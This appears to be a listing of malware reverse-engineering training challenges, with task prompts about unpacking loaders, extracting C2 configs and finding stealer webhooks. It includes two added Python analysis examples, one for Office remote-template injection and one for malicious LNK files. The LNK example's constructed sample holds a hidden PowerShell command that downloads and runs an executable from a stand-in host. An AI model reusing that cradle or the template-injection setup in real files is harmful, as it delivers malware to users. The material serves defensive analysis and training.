49660527c1c910ad2d3c5625c1b44682e465e45b65883dfc8d7d229d1bd0ebd8 | struppigel | advanced | Extract the main.js, then decompile and deobfuscate it far enough that you can see the webhook. | 1 | 0 | 07 Mar 2026
161f2a6ecf64dcbbc1616d536cb2ed2e53afc5a4f5deca810b0f55cc82a6b447 | malwarecakefactory | medium | For RE learning | 1 | 1 | 22 Feb 2026
465dc7a1068d0c7d31b4ffb0a013a59ddd0320dde4389748eed99f41ee0f51ae
|
struppigel
|
medium
|
|
How does this rootkit hide loaded modules of a process? Locate the function that is responsible for that. What's necessary to trigger the module hiding?
|
โ
|
|
0
|
21 Feb 2026
|
1bc77b013c83b5b075c3d3c403da330178477843fc2d8326d90e495a61fbb01f | struppigel | advanced | Create a static C2 extractor that uses abstract syntax tree transformations with Babel. You can use astexplorer.net as a helper tool. | 1 | 0 | 13 Jan 2026
2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6 | struppigel | medium | Create a C2 extractor using a Python script, a binary refinery pipeline or a CyberChef recipe. | 1 | 0 | 11 Jan 2026
cb21368467bdf0ca8a4cd458f54d684e10da2d43a9c7285e094d39bdc410fb10 | struppigel | medium | Unpack the payload and extract the configuration. This is a second-stage file; you can find the [first stage here](https://samplepedia.cc/sample/5bc8b1a067ec4b487e88c2bb93728158633f4fdf22b111d5562cbb4ad3426d30/31/). | 1 | 0 | 04 Jan 2026
5bc8b1a067ec4b487e88c2bb93728158633f4fdf22b111d5562cbb4ad3426d30 | struppigel | medium | Deobfuscate this loader such that you get the download URL. | 2 | 0 | 04 Jan 2026
0ad4f87dfa9b814b78e9db2360a89ea7940fb5ad919637bbaacb1222fb44098d | struppigel | medium | Write an emulation-based unpacker for this crypter. Use the native 32-bit stub and RunPE shellcode. Ignore .NET. | 1 | 0 | 31 Dec 2025
478d992c999a0e93ada1c9aa10644e3abdc207d407492c5bc2710986de4d42be | struppigel | easy | Where does this office document get the next stage and how? When was the document created? | - | 0 | 25 Apr 2026
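For the two questions in the office-document task above (where the next stage is fetched from, and when the document was created), here is an added Python example that is not part of the challenge or its sample. It builds a constructed minimal .docx in memory whose settings part carries a remote attachedTemplate relationship (the remote-template-injection pattern), then reads dcterms:created from docProps/core.xml and lists every relationship with TargetMode="External" together with the part that references it. The URL example.invalid, the creator name and the timestamps are made up for the example.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
NS_DC = "http://purl.org/dc/elements/1.1/"
NS_DCTERMS = "http://purl.org/dc/terms/"
NS_XSI = "http://www.w3.org/2001/XMLSchema-instance"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def rels_owner(rels_name: str) -> str:
    """Map 'word/_rels/settings.xml.rels' to the part it describes, 'word/settings.xml'."""
    folder = posixpath.dirname(posixpath.dirname(rels_name))
    owner = posixpath.join(folder, posixpath.basename(rels_name)[:-len(".rels")])
    return owner or "<package root>"


def analyze_ooxml(data: bytes) -> dict:
    """Return core-property timestamps and every external relationship target in the package."""
    result = {"creator": None, "created": None, "modified": None, "external": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            for key, tag in (("creator", f"{{{NS_DC}}}creator"),
                             ("created", f"{{{NS_DCTERMS}}}created"),
                             ("modified", f"{{{NS_DCTERMS}}}modified")):
                node = core.find(tag)
                if node is not None:
                    result[key] = (node.text or "").strip()
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{NS_REL}}}Relationship"):
                # Internal is the default mode; only External targets leave the package.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                result["external"].append({
                    "part": rels_owner(name),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return result


def rels_xml(*rels) -> str:
    """Render (type, target, is_external) tuples as a .rels part."""
    body = "".join(
        f'<Relationship Id="rId{i}" Type="{REL_TYPE_BASE}{t}" Target="{target}"'
        + (' TargetMode="External"' if external else "") + "/>"
        for i, (t, target, external) in enumerate(rels, 1)
    )
    return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{NS_REL}">{body}</Relationships>'


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (not a real sample): core properties plus a remote attachedTemplate."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<cp:coreProperties xmlns:cp="{NS_CP}" xmlns:dc="{NS_DC}" xmlns:dcterms="{NS_DCTERMS}" xmlns:xsi="{NS_XSI}">'
        '<dc:creator>user</dc:creator>'
        '<dcterms:created xsi:type="dcterms:W3CDTF">2026-01-02T03:04:05Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-03T00:00:00Z</dcterms:modified>'
        '</cp:coreProperties>'
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", rels_xml(("officeDocument", "word/document.xml", False)))
        z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml(("settings", "settings.xml", False)))
        z.writestr("word/settings.xml", f'<w:settings xmlns:w="{W_NS}"/>')
        # The injected template: Word fetches this URL when the document opens.
        z.writestr("word/_rels/settings.xml.rels",
                   rels_xml(("attachedTemplate", "http://example.invalid/template.dotm", True)))
    return buf.getvalue()


if __name__ == "__main__":
    print(analyze_ooxml(build_sample_docx()))
```

Two caveats for real cases: the core.xml timestamps are plain XML that the author controls, so treat dcterms:created as a claim rather than evidence, and for legacy OLE containers (.doc, .xls) the creation time lives in the SummaryInformation stream instead, which this zip-based reader does not cover (olefile handles that). External relationships can also appear in document.xml.rels (hyperlinks, oleObject links) and in rels under word/embeddings, which the loop above picks up because it scans every .rels part.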
060ed0ec27a0a4ad7b55425ed56d8ef0c55aa61b499d4884d1679f18d518ddf3 | struppigel | medium | Find the two webhooks of this stealer and determine the persistence mechanisms. | - | 0 | 23 Mar 2026
57e497bf62138b926d4adab395e0ab64f9f1b606ff9219e0c004fcc5a8348f7a | struppigel | medium | Find the code that is responsible for loading the next stage. Figure out the download URL for the next stage with emulation. | - | 0 | 17 Mar 2026
b0e365c603013751085946ff0500f7d8c0e3c106d3b02c368c2f267279660a6d | struppigel | medium | Write a configuration extractor for this loader. | 1 | 0 | 28 Feb 2026
95a636c2b3af0bc69cc05f7b32281ff17c58cbe637bec5f8918f7514a5f37e09 | struppigel | easy | Check out the LNK in this archive. It downloads malware. How does it achieve that? | 1 | 0 | 21 Feb 2026
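As an added example for the LNK task above, not taken from the challenge's archive: a dependency-free Python parser for the Shell Link StringData fields, which is where a malicious .lnk usually keeps the real payload (the target is often an innocuous path to powershell.exe, cmd.exe or mshta.exe, and the download cradle sits in COMMAND_LINE_ARGUMENTS). The sample .lnk is constructed in memory by build_lnk() with a made-up example.invalid URL; the parser validates the header, skips the LinkTargetIDList and LinkInfo structures instead of decoding them, and then walks the string fields in the fixed order MS-SHLLINK defines.

```python
import re
import struct
import uuid

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Validate the 0x4C-byte header, skip IDList/LinkInfo, and return the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        # IDListSize (2 bytes) does not count itself.
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        # LinkInfoSize (4 bytes) does count itself.
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags, "show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)  # CountCharacters, no terminator follows
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def summarize(data: bytes) -> dict:
    """Reconstruct the command that runs on double-click and pull any URLs out of it."""
    f = parse_lnk(data)
    command = " ".join(x for x in (f.get("relative_path"), f.get("arguments")) if x)
    return {
        "command": command,
        "urls": URL_RE.findall(command),
        "hidden_window": f["show_command"] == SW_SHOWMINNOACTIVE,
    }


def build_lnk(relative_path: str, arguments: str, working_dir: str = "",
              show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Assemble a minimal Unicode .lnk carrying only StringData (constructed test input)."""
    flags, body = IS_UNICODE, b""
    for bit, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir),
                       (HAS_ARGUMENTS, arguments)):
        if value:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I", 0x4C) + LNK_CLSID
    header += struct.pack("<II", flags, 0)               # LinkFlags, FileAttributes
    header += bytes(24)                                  # Creation/Access/Write FILETIMEs
    header += struct.pack("<III", 0, 0, show_command)    # FileSize, IconIndex, ShowCommand
    header += struct.pack("<HHII", 0, 0, 0, 0)           # HotKey, Reserved1..3
    assert len(header) == 0x4C
    return header + body


# Constructed sample: a PowerShell download cradle, not the file from the challenge archive.
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments='-w hidden -nop -c "iwr http://example.invalid/stage2.exe -OutFile $env:TEMP\\s.exe; & $env:TEMP\\s.exe"',
)

if __name__ == "__main__":
    print(summarize(SAMPLE_LNK))
```

When HasLinkTargetIDList is set, the actual target may only be recoverable from the IDList, and a long run of spaces in the arguments (to push the cradle out of the Properties dialog) is common, so for a real archive pair this with a full parser such as LECmd or pylnk3 that also decodes the IDList, LinkInfo and the ExtraData blocks (the TrackerDataBlock's machine ID and MAC are useful attribution artefacts).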
361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd | struppigel | medium | LICENSE.txt was run via `> %ALLUSERSPROFILE%\Microsoft\AppUpdate\SystemInfo\UsbService86.exe LICENSE.txt`. UsbService86.exe has the signer **Python Software Foundation**. Decompile the code, then create a binary refinery pipeline to unpack the next layers. (CyberChef might be an alternative, but I did not check whether it has all the necessary algorithms.) | 1 | 1 | 23 Jan 2026
4029f9fcba1c53d86f2c59f07d5657930bd5ee64cca4c5929cbd3142484e815a | larsborn | medium | Identify and reverse engineer the string deobfuscation function in this sample. Write a binary refinery pipeline to emulate it. Bonus points if you manage to write a Ghidra script. | 1 | 0 | 13 Jan 2026
67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d | larsborn | medium | Find and reverse engineer the string deobfuscation function in the sample. Create a binary refinery pipeline to decrypt the strings. Bonus points if you manage to write a Ghidra script to decrypt them all. | 1 | 0 | 13 Jan 2026
ee69b74d0f0dd59fcd87304863626efb727ad6255bc29a7d48b7a441390dff1a | struppigel | medium | This is packed by the CypherIt crypter. Unpack the malware. Bonus: extract the config of the payload. | 1 | 0 | 11 Jan 2026